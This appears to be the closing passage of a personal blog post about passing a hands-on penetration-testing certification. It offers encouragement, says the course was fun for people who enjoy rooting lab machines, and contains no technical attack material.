Don't be discouraged by people saying it's super hard or almost impossible to get. If you really really really want something and do something about it, then you'll get it.
You will end up having acquired hand-ons and practical skills actionable in the real world.
This is not some theoretical useless certification.

In all, it was an interesting and gratifying experience.
It was a really fun course if you like rooting boxes like I do.

Stay humble, work hard, be positive and keep at it :).

Good luck to anyone trying to pass that certification.